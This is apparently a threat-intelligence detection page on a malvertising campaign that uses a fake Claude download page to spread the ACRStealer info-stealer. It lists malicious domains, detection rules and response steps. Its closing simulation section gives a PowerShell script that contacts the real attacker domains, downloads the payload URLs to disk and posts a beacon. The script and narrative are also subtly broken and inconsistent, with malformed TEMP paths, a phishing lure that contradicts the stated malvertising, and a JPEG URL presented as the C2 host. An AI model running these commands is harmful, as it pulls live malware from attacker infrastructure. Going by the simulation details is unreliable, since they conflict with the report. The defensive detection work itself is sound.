Follow 
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
Threat researchers identified a malicious advertising campaign that redirects users to a fake Claude download page. The site delivers different payloads depending on the victim’s operating system, with the Windows infection chain leading to deployment of ACRStealer. Investigators linked the activity to multiple compromised domains and a command-and-control server used after infection. The campaign relies on obfuscated URLs and a PowerShell script to complete payload delivery.
Investigation
The analyst traced the activity from the initial fake Claude page through several redirected URLs hosted across different domains. During the infection chain, a ZIP archive, a PowerShell script, and a JPEG image were downloaded, followed by HTTPS communication with a command-and-control domain. Traffic analysis confirmed that the post-infection network behavior matched infrastructure associated with the ACRStealer family.
Mitigation
Organizations should block the identified malicious domains and URLs at the network perimeter. Advertising traffic should be filtered for malicious ads that reference the fake Claude page or similar impersonation lures. Endpoint protection should also be configured to detect ACRStealer-related behavior and suspicious PowerShell execution.
Response
Defenders should monitor for outbound connections to the command-and-control domain yw.enhanceblabber.cc and alert on downloads of the identified ZIP archive and PowerShell script. Any host that shows related activity should undergo forensic collection for possible ACRStealer artifacts and be isolated if compromise is confirmed.
Attack Flow
We are still updating this part. Sign up to get notified
Notify MeDetections
Suspicious LOLBAS MSHTA Defense Evasion Behavior by Detection of Associated Commands (via process_creation)
View
Suspicious Command and Control by Unusual Top Level Domain (TLD) DNS Request (via dns)
View
IOCs (HashSha256) to detect: Possible ACR Stealer From Page Impersonating Claude
View
Detection of ACR Stealer Distribution via Fake Claude Download Pages [Windows Network Connection]
View
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.
-
Attack Narrative & Commands:
- Initial Lure: The attacker sends a phishing email containing a link to
https://fairpoint29.com/. The victim clicks the link, which loads a fake Claude download page. - Malicious Downloader Execution: The page automatically triggers a download from
https://primemetricsa.com/1518925, delivering a disguised payload. - Secondary Payload Retrieval: The downloaded stub contacts
https://6ryuefl.creativecommunityinfo.art/Camel-91267b64-989f-49b4-89b4-9e015844d42dto fetch the full ACR Stealer binary. - C2 Beacon: Once executed, the malware posts a beacon to
https://i.ibb.co/Xx16sbMz/init-block.jpg(a technique that abuses image hosting for covert C2).
Each step generates a proxy log entry matching the exact
domainandurlvalues defined in the Sigma rule, thereby satisfying the detection condition. - Initial Lure: The attacker sends a phishing email containing a link to
-
Regression Test Script:
# ------------------------------------------------- # ACR Stealer Distribution Simulation – Trigger Rule # ------------------------------------------------- # Step 1: Fake Claude download page (harmless GET) Invoke-WebRequest -Uri "https://fairpoint29.com/" -UseBasicParsing | Out-Null # Step 2: Downloader binary (simulated by a small file download) Invoke-WebRequest -Uri "https://primemetricsa.com/1518925" -OutFile "$env:TEMPloader.bin" -UseBasicParsing # Step 3: Full payload retrieval Invoke-WebRequest -Uri "https://6ryuefl.creativecommunityinfo.art/Camel-91267b64-989f-49b4-89b4-9e015844d42d" ` -OutFile "$env:TEMPacr_steler.bin" -UseBasicParsing # Step 4: C2 beacon (POSTing a small image to disguise traffic) $body = [System.Text.Encoding]::UTF8.GetBytes("beacon") Invoke-WebRequest -Uri "https://i.ibb.co/Xx16sbMz/init-block.jpg" ` -Method Post -Body $body -ContentType "application/octet-stream" -UseBasicParsing | Out-Null # ------------------------------------------------- # End of Simulation # ------------------------------------------------- -
Cleanup Commands:
# Remove downloaded artifacts Remove-Item "$env:TEMPloader.bin" -ErrorAction SilentlyContinue Remove-Item "$env:TEMPacr_steler.bin" -ErrorAction SilentlyContinue # Flush DNS cache to avoid lingering entries ipconfig /flushdns